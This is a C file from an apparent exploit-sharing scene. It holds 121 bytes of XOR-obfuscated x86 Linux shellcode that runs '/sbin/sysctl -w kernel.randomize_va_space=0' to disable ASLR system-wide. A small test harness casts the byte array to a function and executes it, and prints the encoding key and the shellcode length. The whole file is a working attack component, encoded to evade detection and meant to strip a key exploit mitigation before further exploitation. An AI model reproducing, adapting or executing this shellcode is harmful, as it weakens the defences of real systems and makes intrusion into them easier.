/* sys_execve("/sbin/sysctl", { "/sbin/sysctl", "-w", "kernel.randomize_va_space=0" }, NULL);
 * 121 bytes polymorphic shellcode
 * Programmer : Paulus Gandung Prakosa_ (syn-attack)
 * Thanks to : mywisdom, gunslinger_, nofia fitri, chaer.newbie, wenkhairu, ketek, xtr0nic,
 *             supermen ganteng, and all devilzc0de members
 */

/*
 * Tested in : 
 * - BackTrack 5 (linux-2.6.38-generic)
 * - Ubuntu 10.10 Maverick Meerkat (linux-2.6.38-generic)
 * - Ubuntu 11.04 Natty Narwhal
 * - Debian Squeeze 6.0.2 (linux-2.6.32-5-stable)
 * Note : Be sure to disabling ASLR (Address Space Layout Randomization) first before 
 *        placing and executing our shellcode
 */

#include <stdio.h>
#include <string.h>

char null_space[] = "\xeb\x0d\x5e\x31\xc9\xb1\x65\x80\x36\x7e"
		    "\x46\xe2\xfa\xeb\x05\xe8\xee\xff\xff\xff"
		    "\x4f\xbe\xfd\x92\x7f\xf6\x7a\x5a\x16\x1d"
		    "\x1b\x43\x4e\x16\x21\x0d\x0e\x1f\x16\x1b"
		    "\x21\x08\x1f\x16\x11\x13\x17\x04\x16\x0c"
		    "\x1f\x10\x1a\x16\x10\x1b\x12\x50\x18\x16"
		    "\x1b\x0c\xfd\x92\x7f\xb8\x7a\x5a\x15\xf7"
		    "\x98\xfd\x92\x7f\xf6\x7a\x5a\x18\x16\x53"
		    "\x09\xfd\x92\x7f\xf6\x7a\x5a\x16\x0d\x1d"
		    "\x0a\x12\x16\x10\x51\x0d\x07\x16\x51\x0d"
		    "\x1c\x17\xf7\x9d\x2e\x28\x2d\xce\x75\xf7"
		    "\x9f\x4f\xac\xb3\xfe\x4f\xbe\xce\x7f\xb3"
		    "\xfe";

int main(void) {
  int null_len = strlen(null_space);
  printf("[+] Using key mutation engine : 0x7e\n");
  printf("[+] Length of this shellcode : %d bytes\n", null_len);
  printf("[+] After executing this code, please check the value of \"/proc/sys/kernel/randomize_va_space\"\n");
  (*(void(*)())null_space)();
  return 0;
}

/* devilzc0de.org, hacker-newbie.org, sdf.lonestar.org, 1337day.com */